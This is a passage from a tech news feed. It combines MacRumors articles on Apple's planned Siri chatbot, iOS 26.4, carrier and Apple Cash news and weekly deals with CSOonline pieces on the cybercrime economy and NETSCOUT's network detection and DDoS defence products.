Onscreen awareness will let ‌Siri‌ see what's on your screen and complete actions involving whatever you're looking at. If someone texts you an address, for example, you can tell ‌Siri‌ to add it to their contact card. Or if you're looking at a photo and want to send it to someone, you can ask ‌Siri‌ to do it for you.

Deeper App Integration

Deeper app integration means that ‌Siri‌ will be able to do more in and across apps, performing actions and completing tasks that are just not possible with the personal assistant right now. We don't have a full picture of what ‌Siri‌ will be capable of, but Apple has provided a few examples of what to expect.

Moving files from one app to another.
Editing a photo and then sending it to someone.
Get directions home and share the ETA with Eric.
Send the email I drafted to Eric.

You're not going to have a chat-like interface for back-and-forth conversations with ‌Siri‌ when iOS 26.4 launches, but the personal assistant should be very different than it is now. Apple software engineering chief Craig Federighi told employees last summer that the ‌Siri‌ revamp was successful. "This has put us in a position to not just deliver what we announced, but to deliver a much bigger upgrade than that we envisioned," he said.
Siri Redesign

With all of the new functionality coming to ‌Siri‌, Apple is planning to make visual design changes. It's not quite clear what that will entail, but for the upcoming table-top robot that's in the works, Apple has tested an animated version of ‌Siri‌ that looks similar to the Mac's Finder logo.

Apple could start rolling out that new, more personalized design when ‌Siri‌ gets the major iOS 27 revamp.
Memory

Claude, ChatGPT, and Gemini can remember past conversations and interactions, retaining a memory of the user. Apple is said to be discussing how much the ‌Siri‌ chatbot will be able to remember.

Apple may limit conversational memory to protect user privacy.

Naming

‌Siri‌ is getting a major overhaul, but Apple will probably continue to refer to it as ‌Siri‌. It'll just be a much smarter version of ‌Siri‌.

Underlying Architecture and Servers

Apple has inked a deal with Google that will see Gemini powering upcoming versions of ‌Siri‌. Apple plans to use Gemini for the iOS 26.4 updates that it is introducing, and Google's technology will also power the ‌Siri‌ chatbot.

"Apple and Google have entered into a multi-year collaboration under which the next generation of Apple Foundation Models will be based on Google's Gemini models and cloud technology," the two companies said in a statement in January.

The ‌Siri‌ chatbot specifically will rely on a custom AI model developed by the Google Gemini team. Gurman claims that the custom model is comparable to Gemini 3, and that it will be much more powerful than the model behind Apple's upcoming iOS 26.4 features.

Apple and Google are also discussing running the ‌Siri‌ chatbot on Google's servers powered by Tensor Processing Units, probably because Apple doesn't yet have the infrastructure to handle chatbot queries from billions of active devices per day.

In the future, Apple will be able to transition ‌Siri‌ to a different underlying model, so when the company does have in-house LLMs powerful enough to compete with ChatGPT or Gemini, it can move away from Google. Apple will also potentially be able to offer chatbot capabilities in China by partnering with a Chinese AI company.

China restricts foreign companies from offering AI features in the country.

Platforms

‌Siri‌'s chatbot functionality will be the key new feature in iOS 27, iPadOS 27, and macOS 27, and ‌Siri‌'s capabilities will be integrated into the ‌iPhone‌, ‌iPad‌, and Mac. ‌Siri‌ chatbot features could also come to other platforms like visionOS and tvOS.

Cost

There is no word yet on whether there will be some kind of fee associated with the ‌Siri‌ chatbot. The ‌Siri‌ chatbot won't be able to run entirely on device, and Apple is going to need major cloud processing power. Without taking into account any development or hosting costs, Apple is paying Google approximately $1 billion per year for access to Google's models.

Companies like Google and OpenAI spend billions on infrastructure and compute costs each year, and no AI service is entirely free. Apple will likely need to charge something, but it could do what Google has done with Gemini.

Google offers a free version of Gemini on Pixel smartphones and other Android devices that have integrated AI. The basic version of Gemini is able to answer questions, summarize text, write emails, and control apps and smartphone features.

Android users can pay $20 per month for Gemini Advanced to get access to the more advanced version of Gemini that offers better reasoning, longer context for analyzing bigger documents, and improved coding.

Launch Date

Apple is planning to introduce ‌Siri‌'s chatbot capabilities when it announces iOS 27, iPadOS 27, and macOS 27 at the June Worldwide Developers Conference. If the chatbot features aren't ready to go, Apple will likely hold off on showing off the new functionality because of the major mistake it made with iOS 18 and ‌Apple Intelligence‌.

The ‌Siri‌ chatbot is expected to be introduced in the new updates in September after several months of beta testing.
This article, "Apple's Siri Chatbot in iOS 27: Everything We Know" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Public Mobile Offering Up to 100GB of 5G Data for $20/Month in Canada

Canadian carrier Public Mobile has launched a limited-time flash sale that offers 50% off its 5G Canada — U.S. — Mexico plans for a two-year period.


Here are the discounted plans available to new customers through January 26, with each also including unlimited calling and text messaging:60GB of 5G data for $20 per month (regularly $40 per month)
80GB of 5G data for $25 per month (regularly $50 per month)
100GB of 5G data for $30 per month (regularly $60 per month)Public Mobile says these discounted plans are available for new activations only, but existing customers seem to be able to take advantage of the lower prices too. In the Public Mobile app, tap on Manage Subscription → Change Subscription, and select the 100GB plan for $40 per month. If you switch to that plan, Public Mobile is currently applying the 50% discount for 24 months, meaning you can get 100GB for just $20 per month.

Here is what the app shows when you switch plans upon renewal:


Here is what the app shows when you switch plans immediately:


For a limited time, Public Mobile is offering customers a free eSIM.

You can use your allotted data while roaming in the U.S. and Mexico at no additional cost, but note that Public Mobile limits 5G speeds to up to 250 Mbps. And after the allotted amount, data speeds are reduced to a maximum of just 512 Kbps.

Public Mobile is a prepaid carrier, meaning that you pay upfront for your monthly plan, with no credit check required. You can cancel your subscription at any time.

As a Telus subsidiary, Public Mobile uses the Telus network in Canada. However, Public Mobile customers may be deprioritized in busy areas if necessary, and cellular coverage can vary based on your location. All in all, service might not always be comparable to a major carrier like Bell or Rogers, but your mileage may vary.
This article, "Public Mobile Offering Up to 100GB of 5G Data for $20/Month in Canada" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

What to Expect From iOS 26.4

iOS 26.3 is shaping up to be a relatively minor update, with only a couple of notable new features, but iOS 26.4 is expected to be much more significant.


We are still waiting for the iOS 26.3 Release Candidate to come out, so the first iOS 26.4 beta is likely still at least a few weeks away. Following beta testing, iOS 26.4 will likely be released to the general public at some point in March or April.

Below, we have recapped known or rumored iOS 26.4 features so far.

Personalized Siri


Earlier this month, Apple and Google announced that Google Gemini will help power a more personalized version of Siri coming this year.

The more personalized version of Siri is expected to be introduced with iOS 26.4, following a lengthy delay. The new capabilities will include better understanding of a user's personal context, on-screen awareness, and deeper per-app controls, but some of this functionality might not be available until iOS 27 later this year.

For example, all the way back at WWDC 2024, Apple showed an iPhone user asking Siri about their mother's flight and lunch reservation plans based on info retrieved from the Mail and Messages apps.

Looking ahead, Apple is reportedly planning to launch a full-out Siri chatbot on iOS 27, allowing users to have ChatGPT-like conversations with Siri.

New Emoji


Last year, the Unicode Consortium previewed some of the new emoji that are expected to be added to the iPhone with iOS 26.4.

Here are nine of the new emoji:Trombone
Treasure Chest
Distorted Face
Hairy Creature (aka Bigfoot or Sasquatch)
Fight Cloud
Apple Core
Orca
Ballet Dancers
LandslideApple most recently added new emoji to the iPhone with iOS 18.4, an update that came out in March last year. iOS 17.4, iOS 16.4, and iOS 15.4 also introduced new emoji over the years, so the timing has become predictable by this point.

More

Macworld's Filipe Espósito last month leaked some other potential iOS 26.4 features:If you have credit card information stored in Apple's Passwords app, you will be able to AutoFill those details in third-party apps.
You will be able to create folders in the Freeform app.
Apple is apparently working on a new sports tier for the Apple TV app, but the report did not offer any further details about this.
There are signs of "a new validation system that will check the integrity of the device before logging into Apple ID and iCloud."
A new "Precise Outdoor Location" feature for AirPods in the Find My app.Of course, there will be additional iOS 26.4 features that are still unknown, so stay tuned.Related Roundups: iOS 26, iPadOS 26Related Forum: iOS 26
This article, "What to Expect From iOS 26.4" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

The cybercrime industry continues to challenge CISOs in 2026

Cybercriminals have built structured criminal groups with an organizational model similar to that of a legitimate business. “Cybercrime has become industrialized, a return on investment (ROI)-oriented economy, focused on speed and monetization,” according to Martin Zugec, Bitdefender’s director of technical solutions.
Zugec explains that this modus operandi of cybercriminal groups is characterized by a high degree of specialization, which includes initial access brokers or ransomware-as-a-service (RaaS) affiliates. “Today, sophistication is not measured by the complexity of the tools, but by the simplicity and speed of the execution chain,” says Zugec.
This change requires a shift from a threat detection-based approach to one focused on prevention. “Detection has become a commodity that attackers routinely evade so organizations must go beyond reactive monitoring,” says Zugec. “The goal should be to break attackers’ playbooks and make internal environments inherently hostile to them through proactive hardening that eliminates the operational space they need to succeed.”
The business of cybercrime isn’t new
“Cybercrime has been operating as an industry for years, meaning it has become professionalized and attacks have been modularized,” says Guillermo Fernández, director of sales engineering for southern Europe at WatchGuard Technologies.
In practice, this means that it is no longer necessary for a single attacker to know how to do everything, but rather that the crime is divided into specialties (some steal and resell credentials, others develop and maintain ransomware, others provide infrastructure and negotiation, etc.) and all of this is packaged into models as a service, as we see in the case of ransomware-as-a-service. “This lowers the barrier to entry and reduces the cost of attacking, which explains why we are seeing more and more campaigns and higher volumes,” says Fernández.
In addition, AI helps accelerate the scale and sophistication of some phases or tasks, such as reconnaissance, personalization of deceptions, or automation of parts of the process.
How big is it? “The global economic impact of cybercrime is close to $10 trillion. If it were a country’s economy, it would be one of the three world powers, behind only the United States and China. For organizations, this means that it is not enough to react to incidents. Defense must take the same business approach: anticipation, risk management, operational continuity, and resilience by design,” says Juan Francisco Moreda, director of /fsafe, Fibratel’s cybersecurity unit.
As a result, cybercrime has become a fully industrialized criminal economy, according to Moreda. “Today we are talking about highly specialized organizations, with as-a-service models (ransomware, phishing, malware), their own supply chains, and a clear focus on profitability and scalability.”
That is why Martín Trullás, director of Advanced Solutions at Ingram Micro Spain, believes that cybercrime operates with well-organized structures, different professional profiles in its ranks, short- and long-term objectives, and financing that allows it to improve its model with new technology and new strategies to achieve the success of its operations.
“Cybercriminals are no longer isolated individuals with computer skills and a desire for quick and easy money, but actors who, in some cases, appear to have state support to use them as part of a struggle that transcends the economic and digital spheres and often enters the realm of geopolitics.”
However, in his opinion, there are still simple gangs of cybercriminals whose goal is money or data, which they then turn into profit by reselling it to third parties. “What’s happening is that they now have better access to more powerful technologies with which they can streamline their operations, attacking with greater speed and in a massive and scalable way. This changes the approach to cyber defense: we can no longer be reactive, equipping companies and users with different levels of ‘shields’ and sitting back to wait for the attack to repel it, but rather we must take action,” Trullás adds.
That is why Trullás believes that the best cyber defense strategy must combine passive security with active monitoring of the entire digital ecosystem of the company or user, to reduce the time taken to detect and respond to an incident to limit damage.
Evolution of the security strategy
Alessandro Armenia, global head of cybersecurity at ReeVo, believes that three key aspects are emerging in the current landscape: “First, attacks are no longer isolated events, but coordinated, in some cases automated, operations that often originate within the organizations themselves, for example, due to human error or exposed credentials. Second, the time factor plays a decisive role: even today, many companies realize they are under attack when it is already too late. Finally, the attack surface is growing faster than companies’ ability to manage it.”
As a result, the defense strategy must also evolve. “It can no longer be based solely on compliance or one-off interventions, but must be continuous, structured, and resilience-oriented,” Armenia explains.
And that’s despite the fact that companies have the necessary tools to manage their attack surface. “Where they often fail is in the governance model: cybersecurity continues to be approached as a series of isolated compliance exercises over time, and it is precisely in the gaps between one exercise and another that the attacker manages to infiltrate and carry out the attack.”
Because the reality is: an IT outage becomes a serious problem when the company does not have a plan. “A prepared organization, with defined and tested procedures, is able to recover in a matter of minutes; those that are not prepared run the risk of losing hours, days, and, in some cases, their reputation,” Armenia concludes.
As a result, cybercriminals now have organizational models similar to those of companies. “You can see that there are different types of profiles in these groups, depending on the size of the organization, from the more technical ones, who work in a coordinated team, to the more commercial ones, who are in charge of dealing with victims when negotiation is necessary,” warns David Sancho, senior threat researcher at Trend Micro.
Furthermore, Sancho explains that they often also have people who are responsible for selling the product created to partners or customers, which in the business world would correspond to the channel or the marketing. This is already a reality.”
Established groups
Abraham Vázquez, pre-sales engineer at Infinigate Iberia, gives examples such as the DragonForce or Anubis groups, which “operate as genuine criminal service providers, offering infrastructure, management panels, technical support, and different extortion models. It is a highly fragmented ecosystem, but at the same time very resilient, capable of adapting and regenerating quickly.”
This leads him to conclude that the main implication for defense is that it is no longer enough to react to the final attack. “It is necessary to disrupt the entire criminal chain, reinforcing identity as a central pillar of security, prioritizing proper credential hygiene, greater telemetry capabilities, and rapid containment mechanisms that limit the impact from the early stages of the attack,” Vázquez adds.
And the outlook is not promising. “According to the World Economic Forum, the cybercrime economy will continue to grow, reaching $23 trillion by 2027. Industrialized ransomware, automated fraud networks, and converging crime models will drive this growth,” says Gorka Sainz, director of systems engineering at Fortinet Iberia.
The role of AI and automation
“AI is the new fuel for the criminal economy. It allows them to scale attacks as if they were marketingcampaigns, “argues Salvador Sánchez Taboada of CyberProofUST.
A glance at the business landscape is enough to see that artificial intelligence has become a real multiplier of scale for the criminal economy, enabling the generation of highly granular and personalized phishing campaigns on demand, as Abraham Vázquez argues. “This includes everything from deepfakes of executives to increasingly evasive malware, supported by tools such as WormGPT or FraudGPT. Thanks to these capabilities, attacks are more credible, difficult to detect, and easy to replicate.”
As an example, CrowdStrike’s Threat Hunting report 2025 reveals how cybercriminals are targeting the tools used to build AI agents. “Their goal is to gain access, steal credentials, and deploy malware, highlighting how autonomous systems and non-human identities are a key part of today’s enterprise attack surface and a growing enabler of large-scale automated attacks,” says Álvaro del Hoy, technology strategist at CrowdStrike.
Add to this, that criminal groups are integrating generative AI directly into ransomware, “using it to automatically create variants and optimize processes such as executing attacks, negotiating with victims, and extortion strategies,” says Abraham Vázquez
On the other hand, automation is key to streamlining access, lifecycle, and permission processes, but it also recognizes that attackers seek to exploit identities and privileges at scale, says Albert Barnwell, director of sales for Iberia at CyberArk.
“This means that offensive automation allows cybercriminals to move faster and exploit compromised identities without friction. Thus, organizations must respond with defensive automation, especially in the management of identity lifecycle, permissions, and rights,” Barnwell adds.
We are already reaching a point where the entire attack cycle can be automated through orchestration: agents who investigate a company and its employees (including social media footprints, interests, and potential weaknesses), others who generate highly targeted and convincing phishing, and chains that lead to malware infection, according to Guillermo Fernández. “From there, the malware itself can learn about the environment and find out what tools and defenses are in place within the company in order to adjust its technique and maximize its impact,” he says.
And this doesn’t stop at initial access, as even extortion can be automated. It is even possible for the ransom negotiation to be carried out by a bot that adapts its discourse and conditions based on the responses to squeeze out the payment.
Martin Zugec says AI is not a magic bullet for attackers. While it has significantly helped to scale social engineering attacks, removing language barriers and improving the quality of decoys, these tools are not particularly useful for the heavier work of an intrusion.
“We see very little evidence that AI is successfully replacing human expertise in vulnerability research or exploit development. The RaaS ecosystem relies on trust and human ingenuity. The main drivers of successful attacks continue to be hackers and affiliates who operate manually and navigate complex networks. The question is not what AI is capable of doing in theory, but whether it makes sense from an economic standpoint. For a professional threat actor, the cost of managing, adjusting, and securing an AI framework often outweighs the efficiency gains over traditional and proven hacking techniques,” Zugec elaborates.
Main threats and attack vectors in 2026
The current geopolitical context does not invite optimism either. Carlos Castañeda-Marroquin, head of pre-sales and business development at Serval Networks, believes that “in 2026, we will see an increase in hybrid threats driven by geopolitical tensions, where cyberspace is used as an extension of economic and strategic conflicts between states and related groups. This will translate into espionage, digital sabotage, and disinformation campaigns targeting both critical infrastructure and key industrial sectors.”
The theft of credentials and tokens, the use of infostealers, or the abuse of valid access, combined with a greater emphasis on malware-free techniques and hands-on-keyboard activity, have been gaining ground in recent months, according to David López García, director of operations at Factum. All of this leads, in many cases, to system intrusions that evolve into ransomware and extortion, with increasingly shorter, more automated attack cycles that are clearly aimed at operational and economic impact.
López García also warns that in 2026, the extended perimeter and relationships with third parties will gain prominence. “Faced with a larger surface area of exposure, cybercriminals find more opportunities to exploit configurations, identities, and external dependencies, with a greater likelihood of finding a breach in the supply chain.”
Consequently, the challenge for organizations is no longer just to protect their systems but to effectively govern an interconnected digital ecosystem, where trust becomes one of the most critical assets and having solid solutions or allies is an operational necessity.
In terms of attack vectors, Guillermo Fernández believes that vulnerabilities and weak configurations in remote access and VPNs will continue to be prominent, in addition to the compromise of SaaS tools (accounts, permissions, integrations). “And on the human front, social engineering will become even more effective with advanced phishing and image and voice deepfakes, increasing the risk of fraud. Likewise, we will see more impersonation and initial access. WatchGuard also anticipates that 2026 may be the year of the first agent-based AI-orchestrated end-to-end breach, bringing offensive automation to ‘machine speed,'” Fernández says.
Are companies investing enough in cyber defenses?
A ‘cybersecurity poverty line’ that affects not only budgets, but the availability of strategic leadership and capabilities to define roadmaps, understand key metrics, and evolve toward maturity goals, is an existing issue according to Rafe Pilling, director of threat intelligence at Sophos X-Ops. “The strong performance of the cybersecurity market does not eliminate the fundamental gap between real risk and management perception. Sophos predicts that many of the most serious disruptions in 2026 will not be the result of sophisticated techniques, but of basic security hygiene failures that are entirely preventable,” he explains.
Pilling argues that the reality is that having a CISO in a company is now a luxury, highlighting the magnitude of the specialized talent deficit. Companies must understand cyber resilience as a strategic priority at the management level and not just as a technological challenge. This gap between available capabilities and real threats explains why most organizations lack the visibility, controls, and expertise necessary to defend themselves effectively against a highly industrialized criminal ecosystem.
What is clear is that as cyber threats increase, organizations are facing the reality that security attacks are not just a possibility, but a certainty. “At the same time, it is estimated that there is a global shortage of more than 4.7 million qualified professionals, which means that critical security positions are not being filled when they are most needed,” says Gorka Sainz.
“There remains a clear gap in effectiveness,” says Abraham Vázquez. In his opinion, “many organizations still lack real visibility into their risk exposure, boards of directors maintain a limited level of confidence in defensive capabilities, and third parties continue to play a significant role, being involved in approximately 30% of security breaches.”
On the other hand, there is still a gap between the complexity of the environment (hybrid, SaaS, multi-cloud) and the maturity of identity controls. Likewise, many organizations still do not consistently apply intelligent privilege controls, while the need to automate the identity and permission lifecycle indicates that current investment is not always sufficient or well targeted.
And not only does this gap exist, but there is also a cultural gap, as Salvador Sánchez Taboada points out. “Many management teams see cybersecurity as an expense, not as a lifesaver,” he acknowledges. In Spain and Latin America, we are working to change that view, relying on integration through AI between existing risk plans and new threats: investing in resilience is like investing in good foundations before building a house. Every change of cycle reminds us that the invisible—like foundations—supports everything we value.”
Increased spending “is often diverted toward AI hype and supposedly miraculous solutions driven by marketing, rather than addressing real risks,” argues Martin Zugec. That’s why he believes attackers have evolved toward simpler, harder-to-detect techniques, such as LOTL or ClickFix, which weaponize legitimate system tools and user interactions to bypass security layers.
“This disconnect between where defenders invest and how attackers evolve is a dangerous trend, clearly visible when comparing the findings of real forensic investigations with the narratives popularized in professional networks. This disconnect is reckless,” he warns.
CISO priorities
In this context, CISOs are forced to continually rethink their defense strategies. “Beyond having solid internal teams and adequate prevention tools, it is increasingly necessary to complement these capabilities with trusted technology partners and insurers capable of managing cyber risk in a more holistic way,” says Vincent Nguyen, director of cybersecurity at Stoïk.
As attackers professionalize and scale their operations, Nguyen believes that effective defense requires a proactive and integrated approach that combines advanced cybersecurity solutions, risk transfer through cyber insurance, and operational support when an incident occurs. “Strategic partners with a cross-functional view of risk can accompany organizations before, during, and after an attack, strengthening resilience without replacing internal security leadership,” he adds.
In any case, Martín Trullas acknowledges that there is no single winning strategy for the CISO, but rather a set of different strategies focused on different areas. “On the one hand, identity security must be strengthened, as it can become a gateway for more serious attacks. And this identity security should no longer be understood only as ‘human identity’ but must also focus on the identity of connected devices, which can also become vectors for attack,” he explains.
“At the same time, it is necessary to implement organizational and mindset changes within the company: proper governance, cybersecurity training for all employees, promotion of best practices to reduce risks, and a culture of proactivity to reduce detection and response time in the event of an attack. The entire company must be involved in these processes, because leaving cybersecurity as the sole responsibility of the CISO or the department on duty is a mistake that can be very costly.”
Of course, this requires CISOs to have the right resources. “And they don’t have it easy, with often unrealistic expectations that cause them to experience signs of burnout,” says Fernando Anaya, general manager of Proofpoint for Spain and Portugal.
Anaya cites this data: “In Spain, 51% of security managers say they still lack the necessary means to meet their objectives. Similarly, it is crucial to strengthen incident response capabilities, especially considering that a third of Spanish organizations admit to being unprepared. A much more proactive approach is also needed to foster a culture of cybersecurity that goes beyond simply trusting users and includes concrete and effective actions to reduce data loss. The pressure on CISOs is increasing as these resource constraints are combined with such a rapidly changing threat environment, making it imperative that they work to align themselves strategically with their organizations’ boards of directors, seeking a shared vision that ensures the necessary support and appropriate decision-making.
At the same time, Abraham Vázquez believes that it will be essential to advance zero–trust models and perimeter hardening, eliminating legacy VPNs and accelerating patching processes in edge environments, as well as ensuring proven resilience through immutable backups and isolated recovery environments. “The automation of detection and response, supported by SOAR and AI platforms, will enable the cycle between detection and containment to be closed efficiently, effectively reducing response times. Added to this is the need for more mature third-party and supply chain management, based on continuous assessment of cybersecurity posture and minimal but relevant telemetry.”
“It will be key to conduct internal crisis management exercises that consider realistic scenarios, such as ransomware attacks without payment, fraud using deepfakes of management, or outages of critical suppliers.”

View the full article
CSOonline

Apple Cash Instant Transfer Fees Are Going Up Soon

Apple today began notifying Apple Cash users about an upcoming fee increase for the Instant Transfer feature. Starting on February 18, 2026, choosing the Instant Transfer option will cost 1.7 percent of the transaction amount, with a minimum of $0.25 and a maximum of $25.


Instant Transfer is the Apple Cash option that allows you to transfer money from Apple Cash to your bank account with no waiting period. The current fee is 1.5 percent of the transaction amount, with the same $0.25 minimum fee and a lower $15 maximum fee.

Using Instant Transfer to deposit $1,000 from Apple Cash to a bank account currently requires users to pay a $15 fee, for example, but that will increase to $17 after February 18.

An ACH transfer that takes one to three business days will continue to have no fee, and that is always an option for Apple Cash users.

Transferring money from Apple Cash to a bank account can be done by choosing the Apple Cash card in the Wallet app, tapping on the three-dot more button, and then selecting the Transfer to Bank option.

Apple Cash continues to be limited to the United States. It can be used to send and receive money from friends and contacts right in the Messages app as an alternative to services like Venmo, Zelle, or PayPal.Tag: Apple Cash
This article, "Apple Cash Instant Transfer Fees Are Going Up Soon" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

NETSCOUT recognized for leadership in network detection and response

We’re proud to share that NETSCOUT has been recognized for industry-leading excellence in network detection and response (NDR). This acknowledgment, from Quadrant Knowledge Solutions’ 2025 SPARK Matrix™ for NDR, highlights what our customers already know: NETSCOUT delivers unmatched visibility, precision, and forensic depth across the world’s most complex digital ecosystems.
Below are the strengths that set us apart and continue to define our leadership.
The visibility gap no one wants to talk about
Many organizations still rely on flow-based data or siloed tools that provide snapshots rather than full context. These tools can tell you that something happened; but not what, not how, and not why.
This is where visibility breaks down. This is where attacks hide. This is where risk grows quietly. NETSCOUT’s Omnis Cyber Intelligence closes this critical gap with a simple yet powerful idea: If you can’t see every signal, you can’t trust any conclusion.
Turning packets into understanding
Our proprietary Adaptive Service Intelligence (ASI) technology doesn’t just collect packets; it interprets them via patented deep packet inspection (DPI) at scale capabilities. At up to 100 Gbps, ASI transforms raw traffic into enriched Layer 2–7 metadata that reveals behavior, intent, and impact with a level of precision that flow-based tools simply can’t match.
Machine learning, signatures, threat intelligence, and behavioral analytics all become more effective when powered by truth at the packet level. The result? Fewer false positives, deeper context, stronger investigations, and faster answers.
Visibility becomes clarity. Clarity becomes confidence. Confidence becomes resilience. Forensics that tell the full story, not just the ending
A security event is never just a single moment, it’s a sequence—one that can start long before an alert fires, especially in a zero-day threat scenario.
NETSCOUT’s continuous packet capture provides stored history that is independent of detection, so teams can explore that sequence from its earliest footprint to its last, to truly understand what happened before the alert. This empowers analysts to not just understand what happened but also to reconstruct, retrace, and re-imagine the incident with complete fidelity.
In an era where attackers live off the land, pivot silently, and operate in encrypted channels, this kind of longitudinal visibility isn’t optional; it’s essential.
A borderless approach to modern visibility
Hybrid cloud. Remote work. Containerization. Encryption. Operational technology (OT) and Internet of Things (IoT) sprawl. The perimeter hasn’t just dissolved; it has dissolved everywhere at once.
That’s why NETSCOUT champions Visibility Without Borders, ensuring every corner of the network (physical, virtual, or cloud-based) speaks the same language of packet-level truth. Whether it’s east-west traffic in a data center or encrypted communication from a remote site, the story remains intact and readable. Where other tools stop at infrastructure boundaries, NETSCOUT keeps going.
The future favors the fully informed
As networks evolve, attackers adapt. As security stacks expand, complexity grows. But the organizations that win will be the ones that can see clearly, connect the dots instantly, and understand their environments deeply enough to act decisively.
That future belongs to those with true visibility—the kind only NETSCOUT can deliver.
Leadership in NDR isn’t just something we’ve earned; it’s something we’ve engineered through decades of innovation, relentless focus on packet intelligence, and a commitment to helping organizations see what others can’t.
And we’re just getting started. Read the report here. 
Learn more about Omnis Cyber Intelligence.

View the full article
CSOonline

Smarter DDoS security at scale

In today’s digital landscape, encrypted traffic is the norm—not the exception. While encryption such as Transport Layer Security (TLS) 1.3 protects user privacy and data integrity, it also presents a growing challenge for security teams: How do you defend against threats hidden inside encrypted traffic without overwhelming your systems?
The challenge of encrypted DDoS attacks
Threat actors are always looking for ways to circumvent modern defenses, and one of the most popular distributed denial-of-service (DDoS) attack methods is to hide the attacks in what looks like ordinary traffic. Enormous amounts of internet traffic now rely on Hypertext Transfer Protocol Secure (HTTPS). Since decrypting TLS 1.3 traffic typically requires proxy-based solutions—which are resource-intensive—many security products struggle to inspect encrypted sessions effectively. This blind spot makes encrypted DDoS attacks harder to detect and mitigate.
Block first, ask questions later
One way to minimize the impact of encrypted attack traffic is to simply drop it before decrypting. There are several methods we employ to filter out the garbage quickly and efficiently:
Known source blocking: Many attackers are now using open internet proxies to hide the source of their HTTPS attacks. We constantly track these sources, and our ATLAS Intelligence Feed (AIF)-powered countermeasure can block them automatically. TLS attack prevention: This countermeasure looks at the TLS handshake (pre-encryption) and can block TLS sessions that don’t follow standard user behaviors​. TCP connection limiting: This countermeasure looks at TCP connection behavior from each source. Sources opening too many connections or engaging in abusive behaviors over TCP can be blocked. Rate-based protections: Usually, attackers will be sending more traffic than legitimate users, and these protections can distinguish and block those sources automatically​. Selective decryption: This is used to decrypt and deal with more-advanced attacks, when encrypted traffic behavior mimics legitimate users. Why full decryption isn’t always the answer
Decrypting all traffic isn’t practical. It’s computationally expensive and can quickly exhaust system resources. What’s needed is a smarter approach—one that focuses decryption efforts only where it’s truly necessary.
NETSCOUT’s solution: Selective decryption
NETSCOUT’s Arbor Edge Defense (AED) offers a powerful solution via selective decryption. Positioned at the network edge, AED intelligently decides which traffic to decrypt based on threat indicators and client validation.
Here’s how it works:
Intelligent decryption: As the traffic enters, AED identifies valid client traffic and passes it on without requiring decryption. Suspicious traffic decryption: Only non-validated encrypted traffic is decrypted and analyzed for DDoS threats. Customizable decryption: Users can enable decryption for specific protection groups or levels, allowing targeted inspection without wasting resources. NETSCOUT
Benefits of selection decryption
Efficient resource use: Focuses decryption on suspicious traffic, preserving system performance

Scalable protection: Enables high-scale defense against encrypted threats without compromising throughput

Flexible configuration: Tailors decryption policies to match the needs of different services and threat levels
Conclusion
As encrypted traffic continues to grow, so does the need for smarter security solutions. NETSCOUT AED’s selective decryption approach empowers organizations to defend against encrypted DDoS attacks efficiently and effectively—without sacrificing performance.
  
Learn more about Arbor Edge Defense.

View the full article
CSOonline

Best Apple Deals of the Week: Apple Studio Display Hits Lowest Prices in Months, Plus Accessory Discounts From Satechi and More

This week saw a wide range of Apple-related deals, including some of the lowest prices we've seen in months on the Apple Studio Display, plus solid discounts on the M4 Mac mini, Mac-compatible monitors from Samsung, popular desktop accessories from Satechi, and even more.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Amazon Sale


What's the deal? Take up to $450 off popular accessories
Where can I get it? Amazon
Where can I find the original deal? Right here
$450 OFFEcovacs Deebot T80 Pro Robot Vacuum for $549.99
$350 OFFEcovacs Deebot X8 Pro Robot Vacuum for $749.00

Amazon this week has a few notable sales from popular brands like Ecovacs, Jackery, and Anker. These include discounts on everything from MagSafe-compatible chargers to portable power stations and robot vacuums.

Ecovacs Deebot X9 Pro Omni Robot Vacuum and Mop - $699.00, down from $799.00
Ecovacs Deebot X11 OmniCyclone Robot Vacuum and Mop - $1,099.00, down from $1,499.99
Anker MagGo UFO 3-in-1 Qi2 Charger - $61.98, down from $89.99
Anker 3-in-1 MagSafe-Compatible Charging Cube - $97.49, down from $149.95
Anker 14-Port Prime Docking Station - $169.99, down from $269.99
Anker SOLIX C300 Power Station with Lantern - $179.99, down from $249.00
Jackery Explorer 1000 V2 Portable Power Station - $399.00, down from $799.00
Jackery Explorer 1500 Portable Power Station - $898.99, down from $1,399.00

Apple Studio Display


What's the deal? Take up to $450 off Apple Studio Display
Where can I get it? Woot
Where can I find the original deal? Right here
UP TO $450 OFFApple Studio Display at Woot

Woot this week started a new Apple sale that includes some of the lowest prices we've tracked on the Studio Display in months. The items that we're focusing on in this sale are all in new condition and come with a one year Apple limited warranty, but there are other items that are refurbished.

Prices on the 27-inch Studio Display start at $1,349.00 for the standard glass/VESA mount adapter, down from $1,599.00, and also include all of the nano-texture glass options. We haven't tracked deals on the Studio Display in quite a while, so these are solid markdowns for anyone who's been waiting for a sale.

Mac Mini


What's the deal? Take up to $130 off M4 Mac mini
Where can I get it? Amazon
Where can I find the original deal? Right here
$100 OFFM4 Mac mini (256GB) for $499.00
$110 OFFM4 Mac mini (16GB/512GB) for $689.00
$109 OFFM4 Mac mini (24GB/512GB) for $889.99
$130 OFFM4 Pro Mac mini (24GB/512GB) for $1,269.00

Amazon this week has a few models of Apple's M4 Mac mini on sale at low prices, starting at $499.99 for the model with 16GB RAM/256GB SSD, down from $599.00. Discounts reach up to $130 off in these sales, and this time around there is also a discount on the M4 Pro model.

Satechi


What's the deal? Take 20% off Satechi's new products
Where can I get it? Satechi
Where can I find the original deal? Right here
Note: Use code CES2026 to see this discount.
UP TO 20% OFFSatechi's CES 2026 Sale
Note: Use code REFRESH20 to see this discount.
20% OFFSatechi's Refresh 2026 Sale

Satechi announced a few products at CES this month, and to mark the launch it's providing a 20 percent discount on these devices for early adopters. You can use the code CES2026 at checkout to get 20 percent off all five of Satechi's newest products.

Additionally, Satechi recently kicked off a new sale that has its most popular desktop accessories at 20 percent off for a limited time. To get this discount, enter the code REFRESH20 at checkout on the accessories found in Satechi's "Desk Refresh Collection."

Samsung


What's the deal? Save on Samsung monitors and TVs
Where can I get it? Samsung
Where can I find the original deal? Right here
$300 OFF32-inch Smart Monitor M9 for $1,299.99
$600 OFF65-inch The Frame for $1,199.99
$1,200 OFF75-inch The Frame Pro for $1,999.99

Samsung recently introduced a sale across its most popular Vision AI-supported monitors and TVs, with notable markdowns on products like The Frame and the Smart Monitor series. These deals have all been applied automatically on Samsung's website, and many match all-time low prices on these products.

